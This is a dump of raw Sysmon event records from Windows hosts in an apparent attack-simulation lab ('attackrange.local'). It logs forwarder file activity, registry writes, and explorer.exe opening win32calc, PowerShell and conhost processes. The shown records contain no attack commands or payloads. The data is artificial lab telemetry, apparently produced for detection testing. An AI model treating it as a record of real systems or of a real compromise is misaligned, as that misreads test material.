11241100x800000000000000057350116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:57.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:57.427{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C51811DBDCFB328964C5ACEDEFDBDB95,SHA256=5DFB52E1068B2DECD31DC78E281E39A4D2ED9280BD2B0155EC64964D70417808falsetrue 23542300x800000000000000021219877Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:57.501{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AEB159804B9F831BCDC72AB657E4DA,SHA256=F53747149EEADF17F8F537AC322F79BEAD1B7317CD00EA53560C3030AA30B814,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000021219876Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:43.518{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64343-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 13241300x800000000000000057350142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:58.525{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000180B3E\VirtualDesktopBinary Data 12241200x800000000000000057350141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:58.525{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000180B3E 534500x800000000000000057350140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.507{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe 12241200x800000000000000057350139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-DeleteKey2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:0000000000180B3E 10341000x800000000000000057350138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62a85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057350137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x800000000000000057350136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x800000000000000057350135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6299e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.488{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057350133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057350132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jva32pnyp.rkrBinary Data 10341000x800000000000000057350131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.472{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057350127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:18:58.472{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc\Window_PlacementBinary Data 12241200x800000000000000057350126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:58.472{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057350125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:58.472{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057350124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:58.472{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 11241100x800000000000000057350123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.241{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.241{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEFD6D5336E3035657941C78A58577C1,SHA256=BCAE3641A8A81438FD6850F2A9ED50F84DDFAF801D7582F6DFAE8293E197CB6Efalsetrue 11241100x800000000000000057350121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.241{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:58.241{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B7C9D94A3C0F74AAB881F7EFA0CFA3,SHA256=E4B95FD973F0B8E731450FBC0E4E61034DB1051843F405D2F90AE4F8C68C1F42falsetrue 23542300x800000000000000021219878Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:58.501{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF9212EADEB4C257977999CC8B590820,SHA256=1D6E6B777962B39C0CE6DADFDCA2AAD244FD8C87E20FB1FA9117EDE1A38BD2E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:59.524{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:59.524{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=710C0F4C009C7044FAEFAD7D3E3D6604,SHA256=81553A2D4CB30BDD6F5D3C973F4E50E63EB52CFDEB63FFA95A90CF423A6C3DF9falsetrue 11241100x800000000000000057350144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:59.256{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:59.256{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=576B3271097C9499BA55C1F4D38660F1,SHA256=CF5B8F73DB33658B31671F21B485DCB73B07E9C91C2232320A5F0B978A3437EDfalsetrue 23542300x800000000000000021219879Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:18:59.501{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1565C4F6EB31F7D75AC11E6D9E06F674,SHA256=58E561791DC371188132F9B18693BD98C3880173C90C16D489210C3EFF6F078D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000021219880Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:00.533{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD729C9F0FBAD4E0686C6CA41EC4A0E0,SHA256=DBCF7256F172006B5D5367741A91CD4052A6862586755ACFD91BEDB5BDD3B5D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000057350166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:00.439{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000001A0B42\VirtualDesktopBinary Data 12241200x800000000000000057350165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:00.439{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000001A0B42 534500x800000000000000057350164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.386{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exe 12241200x800000000000000057350163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-DeleteKey2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:00000000001A0B42 13241300x800000000000000057350162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x800000000000000057350161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x800000000000000057350160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61e00|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}873610080C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62967|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+7c2cf|C:\Windows\System32\windows.storage.dll+7b04f|C:\Windows\System32\windows.storage.dll+7dfef|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6165f|C:\Windows\System32\SHELL32.dll+62400|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057350157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x800000000000000057350156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jva32pnyp.rkrBinary Data 10341000x800000000000000057350155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c00|C:\Windows\System32\SHELL32.dll+623bc|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.370{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618b4|C:\Windows\System32\SHELL32.dll+62390|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057350153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.355{8B6011A9-8B2B-618D-C0DA-04000000F101}87366804C:\Windows\explorer.exe{8B6011A9-C6FA-616E-9C35-01000000F101}4136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000057350152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 12:19:00.355{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc\Window_PlacementBinary Data 12241200x800000000000000057350151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:00.355{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057350150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:00.355{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 12241200x800000000000000057350149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:19:00.355{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Calc 11241100x800000000000000057350148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:00.270{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58AEC41657582D7D167627D8D93D6CF5,SHA256=93AEF3B0CFC70E2C359ECAA5893E08E93540E920579B6372C9B13A57B45C775Dfalsetrue 23542300x800000000000000021219881Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:01.533{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F404BA03C10A337DB3E290338FA5E0D0,SHA256=D13B2CBBD84B869753DE2A248BEA75E4FCF258A816EBCDA4031EB3986EC5BFD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057350170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:01.386{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057350169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:01.386{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFAD3B0B5DF0302469A629B621CC38BD,SHA256=A7E7896D0C25D59D207B1F3698903CABF2F6D4715D6E9B5F15B2C8A2908BDC68falsetrue 11241100x800000000000000057350168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:01.271{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 